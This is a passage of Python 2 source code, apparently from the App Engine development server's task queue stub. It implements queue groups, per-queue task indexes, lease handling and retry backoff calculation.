  task['url'] = task_response.url()
  method = task_response.method()
  if method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET:
    task['method'] = 'GET'
  elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST:
    task['method'] = 'POST'
  elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.HEAD:
    task['method'] = 'HEAD'
  elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.PUT:
    task['method'] = 'PUT'
  elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.DELETE:
    task['method'] = 'DELETE'
  else:
    raise ValueError('Unexpected method: %d' % method)
  task['eta'] = _FormatEta(task_response.eta_usec())
  task['eta_usec'] = task_response.eta_usec()
  task['eta_delta'] = _EtaDelta(task_response.eta_usec(), now)
  task['body'] = base64.b64encode(task_response.body())

  # Keep only user-supplied headers; the built-in ones are regenerated below.
  headers = [(header.key(), header.value())
             for header in task_response.header_list()
             if header.key().lower() not in BUILT_IN_HEADERS]

  headers.append(('X-AppEngine-QueueName', queue_name))
  headers.append(('X-AppEngine-TaskName', task_response.task_name()))
  headers.append(('X-AppEngine-TaskRetryCount',
                  str(task_response.retry_count())))
  headers.append(('X-AppEngine-TaskETA',
                  str(_UsecToSec(task_response.eta_usec()))))
  headers.append(('X-AppEngine-Development-Payload', '1'))
  # NOTE: Content-Length reflects the base64-encoded body stored above.
  headers.append(('Content-Length', str(len(task['body']))))

  if 'content-type' not in frozenset(key.lower() for key, _ in headers):
    headers.append(('Content-Type', 'application/octet-stream'))

  headers.append(('X-AppEngine-TaskExecutionCount',
                  str(task_response.execution_count())))
  if task_response.has_runlog() and task_response.runlog().has_response_code():
    headers.append(('X-AppEngine-TaskPreviousResponse',
                    str(task_response.runlog().response_code())))
  task['headers'] = headers

  return task


class _Group(object):
  """A taskqueue group.

  This class contains all of the queues for an application.
  """

  def __init__(self, queue_yaml_parser=None, app_id=None,
               _all_queues_valid=False, _update_newest_eta=None,
               _testing_validate_state=False):
    """Constructor.

    Args:
      queue_yaml_parser: A function that takes no parameters and returns the
          parsed results of the queue.yaml file. If this queue is not based on
          a queue.yaml file use None.
      app_id: The app id this Group is representing or None if it is the
          currently running application.
      _all_queues_valid: Automatically generate queues on first access.
      _update_newest_eta: Callable for automatically executing tasks.
          Takes the ETA of the task in seconds since the epoch, the queue_name
          and a task name. May be None if automatic task running is disabled.
      _testing_validate_state: Should this _Group and all of its _Queues
          validate their state after each operation? This should only be used
          during testing of the taskqueue_stub.
    """
    self._queues = {}
    self._queue_yaml_parser = queue_yaml_parser
    self._all_queues_valid = _all_queues_valid
    self._next_task_id = 1
    self._app_id = app_id
    if _update_newest_eta is None:
      # No-op callback when automatic task running is disabled.
      self._update_newest_eta = lambda x: None
    else:
      self._update_newest_eta = _update_newest_eta
    self._testing_validate_state = _testing_validate_state

  def GetQueuesAsDicts(self):
    """Gets all the applications's queues.

    Returns:
      A list of dictionaries, where each dictionary contains one queue's
      attributes. E.g.:
        [{'name': 'some-queue',
          'max_rate': '1/s',
          'bucket_size': 5,
          'oldest_task': '2009/02/02 05:37:42',
          'eta_delta': '0:00:06.342511 ago',
          'tasks_in_queue': 12,
          'acl': ['user1@gmail.com']}, ...]
      The list of queues always includes the default queue.
    """
    self._ReloadQueuesFromYaml()
    now = datetime.datetime.utcnow()

    queues = []
    for queue_name, queue in sorted(self._queues.items()):
      queue_dict = {}
      queues.append(queue_dict)

      queue_dict['name'] = queue_name
      queue_dict['bucket_size'] = queue.bucket_capacity
      if queue.user_specified_rate is not None:
        queue_dict['max_rate'] = queue.user_specified_rate
      else:
        queue_dict['max_rate'] = ''
      if queue.queue_mode == QUEUE_MODE.PULL:
        queue_dict['mode'] = 'pull'
      else:
        queue_dict['mode'] = 'push'
      queue_dict['acl'] = queue.acl

      oldest_eta = queue.Oldest()
      if oldest_eta:
        queue_dict['oldest_task'] = _FormatEta(oldest_eta)
        queue_dict['eta_delta'] = _EtaDelta(oldest_eta, now)
      else:
        queue_dict['oldest_task'] = ''
        queue_dict['eta_delta'] = ''
      queue_dict['tasks_in_queue'] = queue.Count()

      if queue.retry_parameters:
        retry_proto = queue.retry_parameters
        retry_dict = {}

        if retry_proto.has_retry_limit():
          retry_dict['retry_limit'] = retry_proto.retry_limit()
        if retry_proto.has_age_limit_sec():
          retry_dict['age_limit_sec'] = retry_proto.age_limit_sec()
        if retry_proto.has_min_backoff_sec():
          retry_dict['min_backoff_sec'] = retry_proto.min_backoff_sec()
        if retry_proto.has_max_backoff_sec():
          retry_dict['max_backoff_sec'] = retry_proto.max_backoff_sec()
        if retry_proto.has_max_doublings():
          retry_dict['max_doublings'] = retry_proto.max_doublings()

        queue_dict['retry_parameters'] = retry_dict
    return queues

  def HasQueue(self, queue_name):
    """Check if the specified queue_name references a valid queue.

    Args:
      queue_name: The name of the queue to check.

    Returns:
      True if the queue exists, False otherwise.
    """
    self._ReloadQueuesFromYaml()
    return queue_name in self._queues and (
        self._queues[queue_name] is not None)

  def GetQueue(self, queue_name):
    """Gets the _Queue instance for the specified queue.

    Args:
      queue_name: The name of the queue to fetch.

    Returns:
      The _Queue instance for the specified queue.

    Raises:
      KeyError if the queue does not exist.
    """
    self._ReloadQueuesFromYaml()
    return self._queues[queue_name]

  def GetNextPushTask(self):
    """Finds the task with the lowest eta.

    Returns:
      A tuple containing the queue and task instance for the task with the
      lowest eta, or (None, None) if there are no tasks.
    """
    min_eta = INF
    result = None, None

    # Python 2 dict iteration (itervalues); pull queues never auto-run.
    for queue in self._queues.itervalues():
      if queue.queue_mode == QUEUE_MODE.PULL:
        continue
      task = queue.OldestTask()
      if not task:
        continue
      if task.eta_usec() < min_eta:
        result = queue, task
        min_eta = task.eta_usec()
    return result

  def _ConstructQueue(self, queue_name, *args, **kwargs):
    # _testing_validate_state is owned by this group and forced onto every
    # queue it constructs; callers may not override it.
    if '_testing_validate_state' in kwargs:
      raise TypeError(
          '_testing_validate_state should not be passed to _ConstructQueue')
    kwargs['_testing_validate_state'] = self._testing_validate_state
    self._queues[queue_name] = _Queue(queue_name, *args, **kwargs)

  def _ConstructAutomaticQueue(self, queue_name):
    if queue_name in AUTOMATIC_QUEUES:
      self._ConstructQueue(queue_name, *AUTOMATIC_QUEUES[queue_name])
    else:
      # This should only happen when all queues are considered valid.
      assert self._all_queues_valid
      self._ConstructQueue(queue_name)

  def _ReloadQueuesFromYaml(self):
    """Update the queue map with the contents of the queue.yaml file.

    This function will remove queues that no longer exist in the queue.yaml
    file.

    If no queue yaml parser has been defined, this function is a no-op.
    """
    if not self._queue_yaml_parser:
      return

    queue_info = self._queue_yaml_parser()

    if queue_info and queue_info.queue:
      queues = queue_info.queue
    else:
      queues = []

    old_queues = set(self._queues)
    new_queues = set()

    for entry in queues:
      queue_name = entry.name
      new_queues.add(queue_name)

      retry_parameters = None

      if entry.bucket_size:
        bucket_size = entry.bucket_size
      else:
        bucket_size = DEFAULT_BUCKET_SIZE
      if entry.retry_parameters:
        retry_parameters = queueinfo.TranslateRetryParameters(
            entry.retry_parameters)

      if entry.mode == 'pull':
        mode = QUEUE_MODE.PULL
        if entry.rate is not None:
          logging.warning(
              'Refill rate must not be specified for pull-based queue. '
              'Please check queue.yaml file.')
      else:
        mode = QUEUE_MODE.PUSH
        if entry.rate is None:
          logging.warning(
              'Refill rate must be specified for push-based queue. '
              'Please check queue.yaml file.')
      max_rate = entry.rate

      if entry.acl is not None:
        acl = taskqueue_service_pb.TaskQueueAcl()
        for acl_entry in entry.acl:
          acl.add_user_email(acl_entry.user_email)
      else:
        acl = None

      if self._queues.get(queue_name) is None:
        # A newly declared queue: construct it from the yaml entry.
        self._ConstructQueue(queue_name, bucket_capacity=bucket_size,
                             user_specified_rate=max_rate, queue_mode=mode,
                             acl=acl, retry_parameters=retry_parameters,
                             target=entry.target)
      else:
        # An existing queue: update its settings in place.
        queue = self._queues[queue_name]
        queue.bucket_size = bucket_size
        queue.user_specified_rate = max_rate
        queue.acl = acl
        queue.queue_mode = mode
        queue.retry_parameters = retry_parameters
        if mode == QUEUE_MODE.PUSH:
          eta = queue.Oldest()
          if eta:
            self._update_newest_eta(_UsecToSec(eta))

    if DEFAULT_QUEUE_NAME not in self._queues:
      self._ConstructAutomaticQueue(DEFAULT_QUEUE_NAME)

    new_queues.add(DEFAULT_QUEUE_NAME)
    if not self._all_queues_valid:
      # Remove queues that are no longer in the yaml file.
      for queue_name in old_queues - new_queues:
        del self._queues[queue_name]

  def _ValidateQueueName(self, queue_name):
    """Tests if the specified queue exists and creates it if needed.

    This function replicates the behaviour of the taskqueue service by
    automatically creating the 'automatic' queues when they are first accessed.

    Args:
      queue_name: The name queue of the queue to check.

    Returns:
      If there are no problems, returns TaskQueueServiceError.OK. Otherwise
          returns the correct constant from TaskQueueServiceError.
""" if not queue_name: return taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_NAME elif queue_name not in self._queues: if queue_name in AUTOMATIC_QUEUES or self._all_queues_valid: self._ConstructAutomaticQueue(queue_name) else: return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE elif self._queues[queue_name] is None: return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE return taskqueue_service_pb.TaskQueueServiceError.OK def _CheckQueueForRpc(self, queue_name): """Ensures the specified queue exists and creates it if needed. This function replicates the behaviour of the taskqueue service by automatically creating the 'automatic' queues when they are first accessed. Args: queue_name: The name queue of the queue to check Raises: ApplicationError: If the queue name is invalid, tombstoned or does not exist. """ self._ReloadQueuesFromYaml() response = self._ValidateQueueName(queue_name) if response != taskqueue_service_pb.TaskQueueServiceError.OK: raise apiproxy_errors.ApplicationError(response) def _ChooseTaskName(self): """Returns a string containing a unique task name.""" self._next_task_id += 1 return 'task%d' % (self._next_task_id - 1) def _VerifyTaskQueueAddRequest(self, request, now): """Checks that a TaskQueueAddRequest is valid. Checks that a TaskQueueAddRequest specifies a valid eta and a valid queue. Args: request: The taskqueue_service_pb.TaskQueueAddRequest to validate. now: A datetime.datetime object containing the current time in UTC. Returns: A taskqueue_service_pb.TaskQueueServiceError indicating any problems with the request or taskqueue_service_pb.TaskQueueServiceError.OK if it is valid. 
""" if request.eta_usec() < 0: return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA eta = datetime.datetime.utcfromtimestamp(_UsecToSec(request.eta_usec())) max_eta = now + MAX_ETA if eta > max_eta: return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA queue_name_response = self._ValidateQueueName(request.queue_name()) if queue_name_response != taskqueue_service_pb.TaskQueueServiceError.OK: return queue_name_response if request.has_crontimetable() and self._app_id is None: return taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED if request.mode() == QUEUE_MODE.PULL: max_task_size_bytes = MAX_PULL_TASK_SIZE_BYTES else: max_task_size_bytes = MAX_PUSH_TASK_SIZE_BYTES if request.ByteSize() > max_task_size_bytes: return taskqueue_service_pb.TaskQueueServiceError.TASK_TOO_LARGE return taskqueue_service_pb.TaskQueueServiceError.OK def BulkAdd_Rpc(self, request, response): """Add many tasks to a queue using a single request. Args: request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See taskqueue_service.proto. response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See taskqueue_service.proto. 
""" self._ReloadQueuesFromYaml() if not request.add_request(0).queue_name(): raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE) error_found = False task_results_with_chosen_names = set() now = datetime.datetime.utcfromtimestamp(time.time()) for add_request in request.add_request_list(): task_result = response.add_taskresult() result = self._VerifyTaskQueueAddRequest(add_request, now) if result == taskqueue_service_pb.TaskQueueServiceError.OK: if not add_request.task_name(): chosen_name = self._ChooseTaskName() add_request.set_task_name(chosen_name) task_results_with_chosen_names.add(id(task_result)) task_result.set_result( taskqueue_service_pb.TaskQueueServiceError.SKIPPED) else: error_found = True task_result.set_result(result) if error_found: return if (request.add_request(0).has_transaction() or request.add_request(0).has_datastore_transaction()): self._TransactionalBulkAdd(request) else: self._NonTransactionalBulkAdd(request, response, now) for add_request, task_result in zip(request.add_request_list(), response.taskresult_list()): if (task_result.result() == taskqueue_service_pb.TaskQueueServiceError.SKIPPED): task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK) if id(task_result) in task_results_with_chosen_names: task_result.set_chosen_task_name(add_request.task_name()) def _TransactionalBulkAdd(self, request): """Uses datastore.AddActions to associate tasks with a transaction. Args: request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the tasks to add. N.B. all tasks in the request have been validated and assigned unique names. 
""" try: apiproxy_stub_map.MakeSyncCall( 'datastore_v3', 'AddActions', request, api_base_pb.VoidProto()) except apiproxy_errors.ApplicationError, e: raise apiproxy_errors.ApplicationError( e.application_error + taskqueue_service_pb.TaskQueueServiceError.DATASTORE_ERROR, e.error_detail) def _NonTransactionalBulkAdd(self, request, response, now): """Adds tasks to the appropriate _Queue instance. Args: request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the tasks to add. N.B. all tasks in the request have been validated and those with empty names have been assigned unique names. response: The taskqueue_service_pb.TaskQueueBulkAddResponse to populate with the results. N.B. the chosen_task_name field in the response will not be filled-in. now: A datetime.datetime object containing the current time in UTC. """ queue_mode = request.add_request(0).mode() queue_name = request.add_request(0).queue_name() store = self._queues[queue_name] if store.queue_mode != queue_mode: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE) for add_request, task_result in zip(request.add_request_list(), response.taskresult_list()): try: store.Add(add_request, now) except apiproxy_errors.ApplicationError, e: task_result.set_result(e.application_error) else: task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK) if (store.queue_mode == QUEUE_MODE.PUSH and store.Oldest() == add_request.eta_usec()): self._update_newest_eta(_UsecToSec(add_request.eta_usec())) def UpdateQueue_Rpc(self, request, response): """Implementation of the UpdateQueue RPC. Args: request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest. response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse. 
""" queue_name = request.queue_name() response = self._ValidateQueueName(queue_name) is_unknown_queue = ( response == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE) if response != taskqueue_service_pb.TaskQueueServiceError.OK and ( not is_unknown_queue): raise apiproxy_errors.ApplicationError(response) if is_unknown_queue: self._queues[queue_name] = _Queue(request.queue_name()) if self._app_id is not None: self._queues[queue_name].Populate(random.randint(10, 100)) self._queues[queue_name].UpdateQueue_Rpc(request, response) def FetchQueues_Rpc(self, request, response): """Implementation of the FetchQueues RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest. response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse. """ self._ReloadQueuesFromYaml() for queue_name in sorted(self._queues): if response.queue_size() > request.max_rows(): break if self._queues[queue_name] is None: continue self._queues[queue_name].FetchQueues_Rpc(request, response) def FetchQueueStats_Rpc(self, request, response): """Implementation of the FetchQueueStats rpc which returns 'random' data. This implementation loads some stats from the task store, the rest are random numbers. Args: request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest. response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse. 
""" for queue_name in request.queue_name_list(): stats = response.add_queuestats() if queue_name not in self._queues: stats.set_num_tasks(0) stats.set_oldest_eta_usec(-1) continue store = self._queues[queue_name] stats.set_num_tasks(store.Count()) if stats.num_tasks() == 0: stats.set_oldest_eta_usec(-1) else: stats.set_oldest_eta_usec(store.Oldest()) if random.randint(0, 9) > 0: scanner_info = stats.mutable_scanner_info() scanner_info.set_executed_last_minute(random.randint(0, 10)) scanner_info.set_executed_last_hour(scanner_info.executed_last_minute() + random.randint(0, 100)) scanner_info.set_sampling_duration_seconds(random.random() * 10000.0) scanner_info.set_requests_in_flight(random.randint(0, 10)) def QueryTasks_Rpc(self, request, response): """Implementation of the QueryTasks RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryTasksResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].QueryTasks_Rpc(request, response) def FetchTask_Rpc(self, request, response): """Implementation of the FetchTask RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchTaskRequest. response: A taskqueue_service_pb.TaskQueueFetchTaskResponse. """ self._ReloadQueuesFromYaml() self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].FetchTask_Rpc(request, response) def Delete_Rpc(self, request, response): """Implementation of the Delete RPC. Deletes tasks from the task store. Args: request: A taskqueue_service_pb.TaskQueueDeleteRequest. response: A taskqueue_service_pb.TaskQueueDeleteResponse. 
""" self._ReloadQueuesFromYaml() def _AddResultForAll(result): for _ in request.task_name_list(): response.add_result(result) if request.queue_name() not in self._queues: _AddResultForAll(taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE) elif self._queues[request.queue_name()] is None: _AddResultForAll( taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE) else: self._queues[request.queue_name()].Delete_Rpc(request, response) def DeleteQueue_Rpc(self, request, response): """Implementation of the DeleteQueue RPC. Tombstones the queue. Args: request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest. response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()] = None def PauseQueue_Rpc(self, request, response): """Implementation of the PauseQueue RPC. Args: request: A taskqueue_service_pb.TaskQueuePauseQueueRequest. response: A taskqueue_service_pb.TaskQueuePauseQueueResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].paused = request.pause() def PurgeQueue_Rpc(self, request, response): """Implementation of the PurgeQueue RPC. Args: request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest. response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].PurgeQueue() def QueryAndOwnTasks_Rpc(self, request, response): """Implementation of the QueryAndOwnTasks RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].QueryAndOwnTasks_Rpc(request, response) def ModifyTaskLease_Rpc(self, request, response): """Implementation of the ModifyTaskLease RPC. Args: request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest. 
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].ModifyTaskLease_Rpc(request, response) class Retry(object): """Task retry caclulator class. Determines if and when a task should next be run """ _default_params = taskqueue_service_pb.TaskQueueRetryParameters() def __init__(self, task, queue): """Constructor. Args: task: A taskqueue_service_pb.TaskQueueQueryTasksResponse_Task instance. May be None. queue: A _Queue instance. May be None. """ if task is not None and task.has_retry_parameters(): self._params = task.retry_parameters() elif queue is not None and queue.retry_parameters is not None: self._params = queue.retry_parameters else: self._params = self._default_params def CanRetry(self, retry_count, age_usec): """Computes whether a task can be retried. Args: retry_count: An integer specifying which retry this is. age_usec: An integer specifying the microseconds since the first try. Returns: True if a task is eligible for retrying. """ if self._params.has_retry_limit() and self._params.has_age_limit_sec(): return (self._params.retry_limit() >= retry_count or self._params.age_limit_sec() >= _UsecToSec(age_usec)) if self._params.has_retry_limit(): return self._params.retry_limit() >= retry_count if self._params.has_age_limit_sec(): return self._params.age_limit_sec() >= _UsecToSec(age_usec) return True def CalculateBackoffUsec(self, retry_count): """Calculates time before the specified retry. Args: retry_count: An integer specifying which retry this is. Returns: The number of microseconds before a task should be retried. 
""" exponent = min(retry_count - 1, self._params.max_doublings()) linear_steps = retry_count - exponent min_backoff_usec = _SecToUsec(self._params.min_backoff_sec()) max_backoff_usec = _SecToUsec(self._params.max_backoff_sec()) backoff_usec = min_backoff_usec if exponent > 0: backoff_usec *= (2 ** (min(1023, exponent))) if linear_steps > 1: backoff_usec *= linear_steps return int(min(max_backoff_usec, backoff_usec)) class _Queue(object): """A Taskqueue Queue. This class contains all of the properties of a queue and a sorted list of tasks. """ def __init__(self, queue_name, bucket_refill_per_second=DEFAULT_RATE_FLOAT, bucket_capacity=DEFAULT_BUCKET_SIZE, user_specified_rate=DEFAULT_RATE, retry_parameters=None, max_concurrent_requests=None, paused=False, queue_mode=QUEUE_MODE.PUSH, acl=None, _testing_validate_state=None, target=None): self.queue_name = queue_name self.bucket_refill_per_second = bucket_refill_per_second self.bucket_capacity = bucket_capacity self.user_specified_rate = user_specified_rate self.retry_parameters = retry_parameters self.max_concurrent_requests = max_concurrent_requests self.paused = paused self.queue_mode = queue_mode self.acl = acl self.target = target self._testing_validate_state = _testing_validate_state self.task_name_archive = set() self._sorted_by_name = [] self._sorted_by_eta = [] self._sorted_by_tag = [] self._lock = threading.Lock() def VerifyIndexes(self): """Ensures that all three indexes are in a valid state. This method is used by internal tests and should not need to be called in any other circumstances. Raises: AssertionError: if the indexes are not in a valid state. 
""" assert self._IsInOrder(self._sorted_by_name) assert self._IsInOrder(self._sorted_by_eta) assert self._IsInOrder(self._sorted_by_tag) tasks_by_name = set() tasks_with_tags = set() for name, task in self._sorted_by_name: assert name == task.task_name() assert name not in tasks_by_name tasks_by_name.add(name) if task.has_tag(): tasks_with_tags.add(name) tasks_by_eta = set() for eta, name, task in self._sorted_by_eta: assert name == task.task_name() assert eta == task.eta_usec() assert name not in tasks_by_eta tasks_by_eta.add(name) assert tasks_by_eta == tasks_by_name tasks_by_tag = set() for tag, eta, name, task in self._sorted_by_tag: assert name == task.task_name() assert eta == task.eta_usec() assert task.has_tag() and task.tag() assert tag == task.tag() assert name not in tasks_by_tag tasks_by_tag.add(name) assert tasks_by_tag == tasks_with_tags @staticmethod def _IsInOrder(l): """Determine if the specified list is in ascending order. Args: l: The list to check Returns: True if the list is in order, False otherwise """ sorted_list = sorted(l) return l == sorted_list def _WithLock(f): """Runs the decorated function within self._lock. Args: f: The function to be delegated to. Must be a member function (take self as the first parameter). Returns: The result of f. """ def _Inner(self, *args, **kwargs): with self._lock: ret = f(self, *args, **kwargs) if self._testing_validate_state: self.VerifyIndexes() return ret _Inner.__doc__ = f.__doc__ return _Inner @_WithLock def UpdateQueue_Rpc(self, request, response): """Implementation of the UpdateQueue RPC. Args: request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest. response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse. 
""" assert request.queue_name() == self.queue_name self.bucket_refill_per_second = request.bucket_refill_per_second() self.bucket_capacity = request.bucket_capacity() if request.has_user_specified_rate(): self.user_specified_rate = request.user_specified_rate() else: self.user_specified_rate = None if request.has_retry_parameters(): self.retry_parameters = request.retry_parameters() else: self.retry_parameters = None if request.has_max_concurrent_requests(): self.max_concurrent_requests = request.max_concurrent_requests() else: self.max_concurrent_requests = None self.queue_mode = request.mode() if request.has_acl(): self.acl = request.acl() else: self.acl = None @_WithLock def FetchQueues_Rpc(self, request, response): """Fills out a queue message on the provided TaskQueueFetchQueuesResponse. Args: request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest. response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse. """ response_queue = response.add_queue() response_queue.set_queue_name(self.queue_name) response_queue.set_bucket_refill_per_second( self.bucket_refill_per_second) response_queue.set_bucket_capacity(self.bucket_capacity) if self.user_specified_rate is not None: response_queue.set_user_specified_rate(self.user_specified_rate) if self.max_concurrent_requests is not None: response_queue.set_max_concurrent_requests( self.max_concurrent_requests) if self.retry_parameters is not None: response_queue.retry_parameters().CopyFrom(self.retry_parameters) response_queue.set_paused(self.paused) if self.queue_mode is not None: response_queue.set_mode(self.queue_mode) if self.acl is not None: response_queue.mutable_acl().CopyFrom(self.acl) @_WithLock def QueryTasks_Rpc(self, request, response): """Implementation of the QueryTasks RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryTasksResponse. 
""" assert not request.has_start_tag() if request.has_start_eta_usec(): tasks = self._LookupNoAcquireLock(request.max_rows(), name=request.start_task_name(), eta=request.start_eta_usec()) else: tasks = self._LookupNoAcquireLock(request.max_rows(), name=request.start_task_name()) for task in tasks: response.add_task().MergeFrom(task) @_WithLock def FetchTask_Rpc(self, request, response): """Implementation of the FetchTask RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchTaskRequest. response: A taskqueue_service_pb.TaskQueueFetchTaskResponse. """ task_name = request.task_name() pos = self._LocateTaskByName(task_name) if pos is None: if task_name in self.task_name_archive: error = taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK else: error = taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK raise apiproxy_errors.ApplicationError(error) _, task = self._sorted_by_name[pos] response.mutable_task().add_task().CopyFrom(task) @_WithLock def Delete_Rpc(self, request, response): """Implementation of the Delete RPC. Deletes tasks from the task store. We mimic a 1/20 chance of a TRANSIENT_ERROR when the request has an app_id. Args: request: A taskqueue_service_pb.TaskQueueDeleteRequest. response: A taskqueue_service_pb.TaskQueueDeleteResponse. 
""" for taskname in request.task_name_list(): if request.has_app_id() and random.random() <= 0.05: response.add_result( taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR) else: response.add_result(self._DeleteNoAcquireLock(taskname)) def _QueryAndOwnTasksGetTaskList(self, max_rows, group_by_tag, now_eta_usec, tag=None): assert self._lock.locked() if group_by_tag and tag: return self._IndexScan(self._sorted_by_tag, start_key=(tag, None, None,), end_key=(tag, now_eta_usec, None,), max_rows=max_rows) elif group_by_tag: tasks = self._IndexScan(self._sorted_by_eta, start_key=(None, None,), end_key=(now_eta_usec, None,), max_rows=max_rows) if not tasks: return [] if tasks[0].has_tag(): tag = tasks[0].tag() return self._QueryAndOwnTasksGetTaskList( max_rows, True, now_eta_usec, tag) else: return [task for task in tasks if not task.has_tag()] else: return self._IndexScan(self._sorted_by_eta, start_key=(None, None,), end_key=(now_eta_usec, None,), max_rows=max_rows) @_WithLock def QueryAndOwnTasks_Rpc(self, request, response): """Implementation of the QueryAndOwnTasks RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse. 
""" if self.queue_mode != QUEUE_MODE.PULL: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE) lease_seconds = request.lease_seconds() if lease_seconds < 0: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST) max_tasks = request.max_tasks() if max_tasks <= 0: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST) if request.has_tag() and not request.group_by_tag(): raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST, 'Tag specified, but group_by_tag was not.') now_eta_usec = _SecToUsec(time.time()) tasks = self._QueryAndOwnTasksGetTaskList( max_tasks, request.group_by_tag(), now_eta_usec, request.tag()) tasks_to_delete = [] for task in tasks: retry = Retry(task, self) if not retry.CanRetry(task.retry_count() + 1, 0): logging.warning( 'Task %s in queue %s cannot be leased again after %d leases.', task.task_name(), self.queue_name, task.retry_count()) tasks_to_delete.append(task) continue self._PostponeTaskNoAcquireLock( task, now_eta_usec + _SecToUsec(lease_seconds)) task_response = response.add_task() task_response.set_task_name(task.task_name()) task_response.set_eta_usec(task.eta_usec()) task_response.set_retry_count(task.retry_count()) if task.has_tag(): task_response.set_tag(task.tag()) task_response.set_body(task.body()) for task in tasks_to_delete: self._DeleteNoAcquireLock(task.task_name()) @_WithLock def ModifyTaskLease_Rpc(self, request, response): """Implementation of the ModifyTaskLease RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse. 
""" if self.queue_mode != QUEUE_MODE.PULL: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE) if self.paused: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.QUEUE_PAUSED) lease_seconds = request.lease_seconds() if lease_seconds < 0: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST) pos = self._LocateTaskByName(request.task_name()) if pos is None: if request.task_name() in self.task_name_archive: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK) else: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK) _, task = self._sorted_by_name[pos] if task.eta_usec() != request.eta_usec(): raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED) now_usec = _SecToUsec(time.time()) if task.eta_usec() < now_usec: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED) future_eta_usec = now_usec + _SecToUsec(lease_seconds) self._PostponeTaskNoAcquireLock( task, future_eta_usec, increase_retries=False) response.set_updated_eta_usec(future_eta_usec) @_WithLock def IncRetryCount(self, task_name): """Increment the retry count of a task by 1. Args: task_name: The name of the task to update. """ pos = self._LocateTaskByName(task_name) assert pos is not None, ( 'Task does not exist when trying to increase retry count.') task = self._sorted_by_name[pos][1] self._IncRetryCount(task) def _IncRetryCount(self, task): assert self._lock.locked() retry_count = task.retry_count() task.set_retry_count(retry_count + 1) task.set_execution_count(task.execution_count() + 1) @_WithLock def GetTasksAsDicts(self): """Gets all of the tasks in this queue. Returns: A list of dictionaries, where each dictionary contains one task's attributes. E.g. 
